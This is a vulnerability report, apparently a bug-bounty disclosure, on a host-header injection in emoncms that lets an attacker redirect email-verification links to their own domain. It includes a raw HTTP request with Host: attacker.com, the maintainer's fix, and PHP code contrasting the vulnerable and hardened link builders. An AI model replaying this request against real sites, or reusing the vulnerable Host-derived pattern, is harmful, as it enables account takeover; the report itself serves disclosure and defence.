Misinterpretation of Input in emoncms/dashboard
Reported on Jul 22nd 2021
💥 BUG
Account takeover via host-header injection. It allows an attacker to change the URL of the account-verification link and verify any email address.
💥 STEP TO REPRODUCE
1. First, as the attacker, create an account with the email abc@gmail.com. You don't own that email address.
You can't log in until you verify that email address, but you are not the owner of that email.
Now the attacker sends the account-verify request below:
GET /user/resend-verify.json?&username=bounty HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://emonsdfcms.org/
Cookie: PHPSESSID=juvfp27bj0234ib10irro8a06e
Here in this request header, see that I put Host: attacker-domain.com and send the request.
Now the victim's email address will receive a verification link like https://attacker-domain.com/user/verify?email=yagefix460@dedatre.com&key=49939b70ea5ee9979a67376d47d59a7b.
Here in this URL, see the attacker's domain. When the victim opens his mail and clicks that verification link, the verification code will be sent to attacker-domain.
I've fixed this vulnerability in the core emoncms/emoncms repository:
https://github.com/emoncms/emoncms/commit/09ca537f4c99ae157fa1eea450c77c979867f2fe
Thanks a lot for notifying me of this vulnerability!
The fix suggests that the user sets their emoncms domain manually in the emoncms settings file, which ensures that $_SERVER['HOST'] is not used to discover the installation's domain name.
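To illustrate the mitigation the maintainer describes, here is an added example (not emoncms code and not taken from the commit above) that contrasts a verification-link builder deriving its origin from the request's Host header with one that reads an operator-configured base URL. It assumes the $_SERVER['HOST'] mentioned above refers to PHP's $_SERVER['HTTP_HOST'] server variable; the settings keys base_url and allowed_hosts, the function names, and every sample value are constructed for this example.

```php
<?php
// Added example (not emoncms code): two ways to build the origin used in a
// verification e-mail. The first trusts the request's Host header, which the
// client controls; the second uses a base URL the operator configures once.

// Constructed sample of the situation in the report: the sender of the
// request chose the Host header, so anything derived from it is theirs.
$_SERVER['HTTP_HOST'] = 'attacker.com';

// VULNERABLE PATTERN: origin taken from the Host header. Assumption: the
// report's $_SERVER['HOST'] refers to this server variable.
function verify_link_from_host(string $email, string $key): string {
    $base = 'https://' . $_SERVER['HTTP_HOST'];
    return $base . '/user/verify?email=' . rawurlencode($email)
         . '&key=' . rawurlencode($key);
}

// HARDENED PATTERN: origin comes from a settings value the operator sets;
// the request cannot influence it. 'base_url' is a hypothetical key name
// standing in for whatever the real settings file calls it.
function verify_link_from_settings(array $settings, string $email, string $key): string {
    $base = rtrim($settings['base_url'] ?? '', '/');
    // Refuse to run with an unconfigured or non-https origin rather than
    // silently falling back to the Host header.
    if (!preg_match('#^https://[A-Za-z0-9.-]+(:[0-9]+)?$#', $base)) {
        throw new RuntimeException('base_url must be an explicit https origin');
    }
    return $base . '/user/verify?email=' . rawurlencode($email)
         . '&key=' . rawurlencode($key);
}

// Defence in depth: check the Host header against an allow-list before any
// URL is built, so a mismatched request can be rejected and logged.
function host_header_allowed(array $settings, string $host): bool {
    $allowed = array_map('strtolower', $settings['allowed_hosts'] ?? []);
    return in_array(strtolower($host), $allowed, true);
}

// Constructed configuration and inputs (not real values).
$settings = [
    'base_url'      => 'https://emoncms.example',
    'allowed_hosts' => ['emoncms.example'],
];
$email = 'victim@example.com';
$key   = 'PLACEHOLDER_VERIFICATION_KEY';

// The first link carries the attacker-chosen host; the second always
// carries the configured origin regardless of the request.
echo verify_link_from_host($email, $key), "\n";
echo verify_link_from_settings($settings, $email, $key), "\n";

// A request whose Host header is not on the allow-list should be refused.
if (!host_header_allowed($settings, $_SERVER['HTTP_HOST'])) {
    echo "rejected: unexpected Host header\n";
}
```

The important design point is that the hardened builder never consults the request at all: if the setting is missing it fails closed instead of degrading to the Host header, which is the fallback that made the original link attacker-controllable.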